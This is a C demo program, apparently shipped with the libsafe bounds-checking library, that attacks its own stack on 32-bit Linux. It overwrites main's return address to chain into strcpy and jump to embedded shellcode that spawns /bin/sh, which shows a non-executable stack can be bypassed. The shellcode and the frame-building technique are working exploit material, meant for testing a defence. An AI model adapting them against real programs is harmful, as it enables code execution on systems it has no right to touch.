
    1 /*
    2  * $Name: release2_0-16 $
    3  * $Id: exploit-non-exec-stack.c,v 1.6 2002/06/12 20:30:37 ttsai Exp $
    4  */
    5 
    6 
    7 /*     This sample program demonstrates that even the kernels with
    8  *     non-executable stacks are vulnerable to buffer overflow attacks.  This
    9  *     is code derived from comments by Rafal Wojtczuk (see reference number
   10  *     25) and Linus Torvalds (see reference number 23) in the Libsafe white
   11  *     paper.
   12  */
   13 
   14 #include <stdio.h>
   15 #include <string.h>
   16 #include <stdlib.h>
   17 
/* Address of libc's strcpy(); main() writes it into the overflow pattern as
 * the value that replaces the saved return address. */
#define STRCPY &strcpy
/* Size, in bytes, of the two global arrays 'pattern' and 'buf'. */
#define SIZE 512
/* Copy the named CPU register into 'var' using GCC inline asm.  Only the
 * 32-bit "movl" form is emitted, so this file is i386-only (see also the
 * int/pointer casts in main()). */
#define readRegister(var,reg) __asm__ __volatile__("movl %%" #reg ", %0": "=r" (var))

/* Raw machine-code payload whose trailing bytes are the string "/bin/sh".
 * It is a global, i.e. it lives in the data segment rather than on the
 * stack; main() stages a strcpy() of it into the global 'buf'.  Presumably
 * that is what lets the demo sidestep a non-executable stack, as the file
 * header states -- the bytes themselves are not interpreted here. */
char shellcode[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

/* 'pattern' is the overflow image main() builds and copies over its own
 * stack frame; 'buf' is the global destination of the staged strcpy(). */
char pattern[SIZE];
char buf[SIZE];
   29 
/*
 * Entry point of the demo.  Builds an overflow image in the global
 * 'pattern' and then copies it over the 10-byte local 'a' with an
 * oversized memcpy(), clobbering this frame's saved return address.
 * 'ac' and 'av' are unused.
 *
 * Assumes a 32-bit i386 frame: pointers are squeezed into 'int', and the
 * return address is taken to sit 4 bytes above the saved %ebp.  The
 * program is not meaningful on other architectures.
 *
 * Returns 0 only if control reaches the normal epilogue, which it does
 * not when the overwritten return address is actually used.
 */
int main(int ac, char *av[])
{
    char a[10];         /* the overflow target; its frame is what gets overwritten */
    int fp, offset;     /* fp: current %ebp; offset: bytes from a[0] to the return-address slot */

    /*
     * read the contents of the frame pointer into variable 'fp'.
     */
    readRegister(fp, ebp);
    /* The saved %ebp is at 'fp'; the return address is assumed to be the
     * next 4-byte slot above it (standard i386 frame layout). */
    offset = fp - (int) a + 4;

    /* Filler for everything below the return address; 0xff is arbitrary
     * non-zero padding. */
    memset(pattern, '\xff', SIZE);
    /* Frame image that lands on the return-address slot, arranged as the
     * cdecl frame strcpy() expects on entry:
     *   +0   return address of main  -> strcpy  (main "returns" into libc)
     *   +4   return address of strcpy -> buf
     *   +8   strcpy argument 1 (dst)  -> buf
     *   +12  strcpy argument 2 (src)  -> shellcode
     * Nothing checks that offset + 16 <= SIZE; a larger frame than the
     * author expected would run these stores past the end of 'pattern'. */
    *(int *) (pattern + offset) = (int) STRCPY;
    *(int *) (pattern + offset + 4) = (int) &buf;
    *(int *) (pattern + offset + 8) = (int) &buf;
    *(int *) (pattern + offset + 12) = (int) &shellcode;
    /* Terminator; not included in the memcpy() length below. */
    pattern[offset + 16] = '\0';

    printf("This program demonstrates how a (stack) buffer overflow\n");
    printf("can attack linux kernels with *non-executable* stacks.\n");
    printf("This is variation on return-int-libc attack.\n");
    printf("If you get a /bin/sh prompt, then the exploit has worked.\n");
    printf("Press any key to continue...");
    getchar();  /* pause so the banner is visible before the overflow happens */

    /* The overflow itself: offset + 16 bytes into a 10-byte array.  This
     * is the libc call a bounds-checking wrapper such as the one this file
     * ships with (libsafe) is expected to intercept, because the copy
     * length exceeds the distance from 'a' to its frame boundary. */
    memcpy(a, pattern, offset+16);

    return 0;
}